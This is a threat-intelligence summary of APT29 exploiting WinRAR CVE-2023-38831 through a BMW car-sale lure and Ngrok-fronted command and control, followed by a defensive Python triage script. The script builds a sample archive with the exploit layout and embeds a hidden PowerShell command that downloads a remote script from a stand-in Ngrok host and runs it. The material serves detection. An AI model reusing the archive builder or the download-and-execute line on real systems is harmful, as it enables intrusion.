November 20, 2023 at 09:42AM
APT29, a Russian state-sponsored hacking group, is exploiting the CVE-2023-38831 vulnerability in WinRAR in its cyberattacks. The group is using a BMW car sale lure to target embassy entities. The vulnerability allows execution of malicious code when a user opens a file inside a crafted .RAR or .ZIP archive. APT29 has been using a Ngrok free static domain to front its command and control server and evade detection. The group previously used the same BMW car ad phishing lure to target diplomats in Ukraine. The campaign stands out for combining the WinRAR vulnerability with a novel technique for communicating with the malicious server. Other threat actors have also incorporated the vulnerability into their attacks.
Key takeaways:
1. A Russian state-sponsored hacking group known as APT29 (also tracked as Cozy Bear, NOBELIUM and Midnight Blizzard, among other names) is leveraging the CVE-2023-38831 vulnerability in WinRAR in its cyberattacks.
2. The APT29 group has been targeting embassy entities with a BMW car sale lure.
3. CVE-2023-38831 lets an attacker craft an archive in which opening a harmless-looking file (such as a PDF) also runs a script hidden in a folder of the same name, so malicious code executes in the background. WinRAR 6.23 fixed the flaw.
4. Threat actors have been exploiting this vulnerability since April 2023, initially targeting traders on cryptocurrency and stock trading forums.
5. APT29 has been using a malicious ZIP archive whose lure file is named “DIPLOMATIC-CAR-FOR-SALE-BMW.pdf” to target multiple European countries.
6. APT29 previously used the BMW car ad phishing lure to target diplomats in Ukraine.
7. They combined phishing tactics with HTML smuggling (delivering the malicious payload inside an HTML attachment that assembles it in the victim's browser) and a new method of reaching their malicious server.
8. APT29 used Ngrok's services, specifically the free static domains feature, to reach its command and control server through a Ngrok-hosted hostname rather than attacker-owned infrastructure.
9. Because traffic to a Ngrok domain blends in with legitimate developer use of the service, this lets the group communicate with compromised systems without drawing attention.
10. CVE-2023-38831 has also been exploited by other advanced threat actors, including APT28 and other Russian and Chinese state-backed groups.
11. The APT29 campaign stands out for its mix of old and new techniques, pairing the known WinRAR vulnerability with Ngrok's static domains.
12. The Ukrainian agency that reported the campaign provides indicators of compromise (IoCs): filenames, email addresses, domains, and hashes for the PowerShell scripts and an email file.
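The archive layout the vulnerability abuses (takeaway 3) and the Ngrok indicator (takeaways 8 and 9) can both be checked with a short triage script. The Python below is an added example written for this page, not code from the Ukrainian report or from any vendor named here. The archive it builds is constructed to reproduce the CVE-2023-38831 layout: a decoy file whose name ends in a space, beside a same-named folder holding a script whose name also starts with the decoy's name. The decoy body, the script text and the hostname example-lure.ngrok-free.app are hypothetical; only the lure filename comes from the page. It handles ZIP archives only (RAR would need a separate parser).

```python
import io
import os
import re
import zipfile

# Extensions Windows will execute when ShellExecute resolves the decoy's
# name to a script that was extracted next to it.
SCRIPT_EXTS = {".cmd", ".bat", ".exe", ".com", ".scr", ".vbs", ".js", ".ps1", ".lnk"}

# Free Ngrok static domains are issued under ngrok-free.app; older tunnel
# hostnames use ngrok.io / ngrok.app.
NGROK_RE = re.compile(r"\b[a-z0-9-]+\.ngrok(?:-free)?\.(?:app|io)\b", re.IGNORECASE)
POWERSHELL_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)

LURE = "DIPLOMATIC-CAR-FOR-SALE-BMW.pdf"  # lure filename cited in the report


def build_sample_archive() -> bytes:
    """Constructed sample reproducing the CVE-2023-38831 layout.

    Not the real campaign archive: the decoy body, the script text and the
    Ngrok hostname are made up for this example.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # Decoy with a trailing space, plus a same-named folder holding a
        # script whose name also starts with the decoy's name.
        zf.writestr(LURE + " ", b"%PDF-1.4\n% decoy document\n")
        zf.writestr(
            LURE + " /" + LURE + " .cmd",
            'powershell.exe -w hidden -c "iwr https://example-lure.ngrok-free.app/p.ps1 | iex"\n',
        )
    return buf.getvalue()


def build_benign_archive() -> bytes:
    """Constructed near-miss: same-named folder, but no script inside it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4\n")
        zf.writestr("report.pdf/notes.txt", "just notes\n")
    return buf.getvalue()


def find_exploit_pairs(zip_bytes: bytes) -> list[dict]:
    """Return decoy/script pairs laid out the way CVE-2023-38831 requires."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    hits = []
    for decoy in (n for n in names if "/" not in n):
        folder = decoy + "/"
        for entry in names:
            if not entry.startswith(folder) or entry == folder:
                continue
            inner = entry[len(folder):]
            if "/" in inner:
                continue  # only direct children of the same-named folder count
            base, ext = os.path.splitext(inner)
            if ext.lower() in SCRIPT_EXTS and base.rstrip() == decoy.rstrip():
                hits.append({
                    "decoy": decoy,
                    "script": entry,
                    # The trailing space is what makes WinRAR extract both
                    # entries and hand the wrong name to ShellExecute.
                    "trailing_space": decoy != decoy.rstrip(),
                })
    return hits


def script_indicators(zip_bytes: bytes, script_entry: str) -> dict:
    """Pull C2-related indicators out of one script entry."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        text = zf.read(script_entry).decode("utf-8", errors="replace")
    return {
        "ngrok_domains": sorted({m.group(0).lower() for m in NGROK_RE.finditer(text)}),
        "invokes_powershell": POWERSHELL_RE.search(text) is not None,
    }


def triage(zip_bytes: bytes) -> dict:
    """Summarise an archive: exploit-layout hits plus indicators per script."""
    pairs = find_exploit_pairs(zip_bytes)
    for hit in pairs:
        hit.update(script_indicators(zip_bytes, hit["script"]))
    return {"suspicious": bool(pairs), "hits": pairs}


if __name__ == "__main__":
    print(triage(build_sample_archive()))
    print(triage(build_benign_archive()))
```

The structural check is deliberately strict (script base name equal to the decoy name after trimming trailing whitespace), which is the condition ShellExecute needs for the swap to work; a looser rule that flags any script inside a same-named folder catches more variants at the cost of noise. The domain regex only confirms that the script reaches for Ngrok; the hashes and domains the Ukrainian agency published should still be matched separately, and hosts running WinRAR older than 6.23 remain exposed regardless of what this script finds.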